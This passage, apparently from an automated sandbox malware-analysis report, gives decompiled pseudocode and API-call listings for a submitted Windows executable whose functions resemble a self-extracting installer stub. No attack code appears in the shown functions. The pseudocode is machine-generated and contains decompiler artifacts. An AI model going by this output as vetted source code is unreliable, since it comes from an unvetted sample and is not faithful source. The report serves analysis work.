                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                    							_t36 = 0;
                                                                                                                                                                                                    							FreeResource(??);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							FreeResource();
                                                                                                                                                                                                    							_v36 = _v36 + 1;
                                                                                                                                                                                                    							E0017171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                    							_t46 = 0;
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					return E00176CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}






















                                                                                                                                                                                                    0x00176298
                                                                                                                                                                                                    0x001762a0
                                                                                                                                                                                                    0x001762a7
                                                                                                                                                                                                    0x001762ad
                                                                                                                                                                                                    0x001762af
                                                                                                                                                                                                    0x001762bb
                                                                                                                                                                                                    0x001762c3
                                                                                                                                                                                                    0x001762c4
                                                                                                                                                                                                    0x0017633b
                                                                                                                                                                                                    0x0017633b
                                                                                                                                                                                                    0x00176345
                                                                                                                                                                                                    0x0017634d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001762da
                                                                                                                                                                                                    0x001762de
                                                                                                                                                                                                    0x0017635f
                                                                                                                                                                                                    0x00176369
                                                                                                                                                                                                    0x001762e0
                                                                                                                                                                                                    0x001762e0
                                                                                                                                                                                                    0x001762e0
                                                                                                                                                                                                    0x001762e3
                                                                                                                                                                                                    0x001762e5
                                                                                                                                                                                                    0x001762e5
                                                                                                                                                                                                    0x001762e8
                                                                                                                                                                                                    0x001762e8
                                                                                                                                                                                                    0x001762ea
                                                                                                                                                                                                    0x001762eb
                                                                                                                                                                                                    0x001762ef
                                                                                                                                                                                                    0x001762f1
                                                                                                                                                                                                    0x001762f3
                                                                                                                                                                                                    0x00176302
                                                                                                                                                                                                    0x00176308
                                                                                                                                                                                                    0x0017630d
                                                                                                                                                                                                    0x00176314
                                                                                                                                                                                                    0x00176314
                                                                                                                                                                                                    0x00176316
                                                                                                                                                                                                    0x00176319
                                                                                                                                                                                                    0x00176355
                                                                                                                                                                                                    0x00176357
                                                                                                                                                                                                    0x0017631b
                                                                                                                                                                                                    0x0017631b
                                                                                                                                                                                                    0x00176331
                                                                                                                                                                                                    0x00176334
                                                                                                                                                                                                    0x00176339
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176339
                                                                                                                                                                                                    0x00176319
                                                                                                                                                                                                    0x0017636b
                                                                                                                                                                                                    0x0017637d
                                                                                                                                                                                                    0x0017637d
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 001762CD
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 001762D4
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 0017631B
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00176345
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001751CA,00000004,00000024,00172F71,?,00000002,00000000), ref: 00176357
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                    • String ID: UPDFILE%lu
                                                                                                                                                                                                    • API String ID: 2922116661-2329316264
                                                                                                                                                                                                    • Opcode ID: 0cf32194e66d5a5ebbca765427ccb04c27422bc08b282b1e2472ed6b88a7d6e9
                                                                                                                                                                                                    • Instruction ID: 797bbfd4b95d557ce98753a1fd8146a5f286e62f58544a43d8b165745fb0f74a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cf32194e66d5a5ebbca765427ccb04c27422bc08b282b1e2472ed6b88a7d6e9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6721F671A00619ABDB149F64CC459BE7B7CFF88710B108119F90EA3641DB359D86CBE1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E0017681F(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                    				void* _v172;
                                                                                                                                                                                                    				int* _v176;
                                                                                                                                                                                                    				int _v180;
                                                                                                                                                                                                    				int _v184;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t36 = __ebx;
                                                                                                                                                                                                    				_t19 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                    				_t41 =  *0x1781d8; // 0x0
                                                                                                                                                                                                    				_t43 = 0;
                                                                                                                                                                                                    				_v180 = 0xc;
                                                                                                                                                                                                    				_v176 = 0;
                                                                                                                                                                                                    				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                    					 *0x1781d8 = 0;
                                                                                                                                                                                                    					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    						_t41 =  *0x1781d8; // 0x0
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t41 = 1;
                                                                                                                                                                                                    						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t31 = RegQueryValueExA(_v172, 0x171140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                    							_t43 = _t31;
                                                                                                                                                                                                    							RegCloseKey(_v172);
                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t40 =  &_v176;
                                                                                                                                                                                                    								if(E001766F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                    									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                    										 *0x1781d8 = _t41;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x0017681f
                                                                                                                                                                                                    0x0017682a
                                                                                                                                                                                                    0x00176831
                                                                                                                                                                                                    0x00176836
                                                                                                                                                                                                    0x0017683c
                                                                                                                                                                                                    0x0017683e
                                                                                                                                                                                                    0x00176848
                                                                                                                                                                                                    0x00176851
                                                                                                                                                                                                    0x0017685d
                                                                                                                                                                                                    0x00176864
                                                                                                                                                                                                    0x00176876
                                                                                                                                                                                                    0x0017693a
                                                                                                                                                                                                    0x0017693a
                                                                                                                                                                                                    0x0017687c
                                                                                                                                                                                                    0x0017687e
                                                                                                                                                                                                    0x00176885
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001768d6
                                                                                                                                                                                                    0x001768f4
                                                                                                                                                                                                    0x00176900
                                                                                                                                                                                                    0x00176902
                                                                                                                                                                                                    0x0017690a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017690c
                                                                                                                                                                                                    0x0017690c
                                                                                                                                                                                                    0x0017691c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017691e
                                                                                                                                                                                                    0x00176924
                                                                                                                                                                                                    0x0017692b
                                                                                                                                                                                                    0x00176932
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017692b
                                                                                                                                                                                                    0x0017691c
                                                                                                                                                                                                    0x0017690a
                                                                                                                                                                                                    0x00176885
                                                                                                                                                                                                    0x00176876
                                                                                                                                                                                                    0x00176951

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0017686E
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004A), ref: 001768A7
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001768CC
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,?,0000000C), ref: 001768F4
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00176902
                                                                                                                                                                                                      • Part of subcall function 001766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0017691A), ref: 00176741
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 001768C2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                    • Opcode ID: a35a29c83141037a66deec5bfb78acb54f4aff2f2e9877cb5ce5bfa460c2154e
                                                                                                                                                                                                    • Instruction ID: 343b6b3f77ec8d7fb9b236689a17c1a2e8b128348961c9919766948028f4d577
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a35a29c83141037a66deec5bfb78acb54f4aff2f2e9877cb5ce5bfa460c2154e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5316F31A406189FDB21DF12CC45BAAB7B8FF45768F4081A5EA4DA6540DB309EC5CF52
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00173A3F(void* __eflags) {
                                                                                                                                                                                                    				void* _t3;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				CHAR* _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t16 = "LICENSE";
                                                                                                                                                                                                    				_t1 = E0017468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                    				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                    				 *0x178d4c = _t3;
                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                    					_t19 = _t16;
                                                                                                                                                                                                    					if(E0017468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA( *0x178d4c, "<None>") == 0) {
                                                                                                                                                                                                    							LocalFree( *0x178d4c);
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							 *0x179124 = 0;
                                                                                                                                                                                                    							return 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t9 = E00176517(_t19, 0x7d1, 0, E00173100, 0, 0);
                                                                                                                                                                                                    						LocalFree( *0x178d4c);
                                                                                                                                                                                                    						if(_t9 != 0) {
                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x179124 = 0x800704c7;
                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					LocalFree( *0x178d4c);
                                                                                                                                                                                                    					 *0x179124 = 0x80070714;
                                                                                                                                                                                                    					goto L2;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    				 *0x179124 = E00176285();
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}






                                                                                                                                                                                                    0x00173a46
                                                                                                                                                                                                    0x00173a57
                                                                                                                                                                                                    0x00173a5d
                                                                                                                                                                                                    0x00173a63
                                                                                                                                                                                                    0x00173a6a
                                                                                                                                                                                                    0x00173a91
                                                                                                                                                                                                    0x00173a9a
                                                                                                                                                                                                    0x00173ad8
                                                                                                                                                                                                    0x00173b13
                                                                                                                                                                                                    0x00173b19
                                                                                                                                                                                                    0x00173b1b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173b21
                                                                                                                                                                                                    0x00173ae7
                                                                                                                                                                                                    0x00173af4
                                                                                                                                                                                                    0x00173afc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173afe
                                                                                                                                                                                                    0x00173a87
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173a87
                                                                                                                                                                                                    0x00173aa8
                                                                                                                                                                                                    0x00173ab3
                                                                                                                                                                                                    0x00173ab9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173ab9
                                                                                                                                                                                                    0x00173a78
                                                                                                                                                                                                    0x00173a82
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00172F64,?,00000002,00000000), ref: 00173A5D
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00173AB3
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00173AD0
                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00173B13
                                                                                                                                                                                                      • Part of subcall function 00176517: FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
                                                                                                                                                                                                      • Part of subcall function 00176517: LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
                                                                                                                                                                                                      • Part of subcall function 00176517: DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
                                                                                                                                                                                                      • Part of subcall function 00176517: FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00173100,00000000,00000000), ref: 00173AF4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                    • Opcode ID: 90df8544ef0a2774e0f882f1ab59bf9a9a38a69f75b0f6ff62bc0005ba6e97d9
                                                                                                                                                                                                    • Instruction ID: 342e8bf7596705ee4af682577f3c62914868131e463e1f2437f5dcaa3f51aad4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90df8544ef0a2774e0f882f1ab59bf9a9a38a69f75b0f6ff62bc0005ba6e97d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF112970340201ABD734AF769C0DE5B3ABDDFE5710B50C53EB94ED69A1DB7988C0A620
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001724E0(void* __ebx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t7;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				long _t26;
                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = __ebx;
                                                                                                                                                                                                    				_t7 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                    				_t25 = 0x104;
                                                                                                                                                                                                    				_t26 = 0;
                                                                                                                                                                                                    				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    					E0017658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                    					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                    					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                    					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                    						_lclose(_t25);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x001724e0
                                                                                                                                                                                                    0x001724eb
                                                                                                                                                                                                    0x001724f2
                                                                                                                                                                                                    0x001724f7
                                                                                                                                                                                                    0x00172504
                                                                                                                                                                                                    0x0017250e
                                                                                                                                                                                                    0x0017251d
                                                                                                                                                                                                    0x0017252c
                                                                                                                                                                                                    0x00172541
                                                                                                                                                                                                    0x00172546
                                                                                                                                                                                                    0x00172553
                                                                                                                                                                                                    0x00172555
                                                                                                                                                                                                    0x00172555
                                                                                                                                                                                                    0x00172546
                                                                                                                                                                                                    0x0017256c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00172506
                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0017252C
                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0017253B
                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0017254C
                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00172555
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                    • Opcode ID: 06701e1b57096760dedfc1438191a9b414cba3dba1f105d54ed72922672b5aba
                                                                                                                                                                                                    • Instruction ID: 93d9ad15f2237305226958f643193f1c4df11a11bb7f2e366bc577bfa143c07a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06701e1b57096760dedfc1438191a9b414cba3dba1f105d54ed72922672b5aba
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91019E326001186BC7209B699C0CEDFBB7DEF85760F504555FA4DD3190DB748EC68AA1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E001736EE(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                    				CHAR* _v428;
                                                                                                                                                                                                    				CHAR* _v432;
                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                    				CHAR* _v440;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                    				CHAR* _t77;
                                                                                                                                                                                                    				CHAR* _t91;
                                                                                                                                                                                                    				CHAR* _t94;
                                                                                                                                                                                                    				int _t97;
                                                                                                                                                                                                    				CHAR* _t98;
                                                                                                                                                                                                    				signed char _t99;
                                                                                                                                                                                                    				CHAR* _t104;
                                                                                                                                                                                                    				signed short _t107;
                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                    				short _t113;
                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                    				signed char _t115;
                                                                                                                                                                                                    				short _t119;
                                                                                                                                                                                                    				CHAR* _t123;
                                                                                                                                                                                                    				CHAR* _t124;
                                                                                                                                                                                                    				CHAR* _t129;
                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                    				signed int _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				CHAR* _t138;
                                                                                                                                                                                                    				signed int _t139;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t72 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                    				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                    				_t115 = __ecx;
                                                                                                                                                                                                    				_t135 = 0;
                                                                                                                                                                                                    				_v432 = __ecx;
                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                    				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                    					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                    					_t119 = 2;
                                                                                                                                                                                                    					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                    					__eflags = _t77;
                                                                                                                                                                                                    					if(_t77 == 0) {
                                                                                                                                                                                                    						_t119 = 0;
                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                    						 *0x178184 = 1;
                                                                                                                                                                                                    						 *0x178180 = 1;
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						 *0x179a40 = _t119;
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						__eflags =  *0x178a34 - _t138; // 0x0
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                                    						if(_t115 == 0) {
                                                                                                                                                                                                    							goto L66;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_v428 = _t135;
                                                                                                                                                                                                    						__eflags = _t119;
                                                                                                                                                                                                    						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                    						_t11 =  &_v420;
                                                                                                                                                                                                    						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                    						__eflags =  *_t11;
                                                                                                                                                                                                    						_v440 = _t115;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_v424 = _t135 * 0x18;
                                                                                                                                                                                                    							_v436 = E00172A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                    							_t91 = E00172A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                    							_t123 = _v436;
                                                                                                                                                                                                    							_t133 = 0x54d;
                                                                                                                                                                                                    							__eflags = _t123;
                                                                                                                                                                                                    							if(_t123 < 0) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								__eflags = _v420 - 1;
                                                                                                                                                                                                    								if(_v420 == 1) {
                                                                                                                                                                                                    									_t138 = 0x54c;
                                                                                                                                                                                                    									L36:
                                                                                                                                                                                                    									__eflags = _t138;
                                                                                                                                                                                                    									if(_t138 != 0) {
                                                                                                                                                                                                    										L40:
                                                                                                                                                                                                    										__eflags = _t138 - _t133;
                                                                                                                                                                                                    										if(_t138 == _t133) {
                                                                                                                                                                                                    											L30:
                                                                                                                                                                                                    											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                    											_t115 = 0;
                                                                                                                                                                                                    											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                    											__eflags = _t138 - _t133;
                                                                                                                                                                                                    											_t133 = _v432;
                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                    												_t124 = _v440;
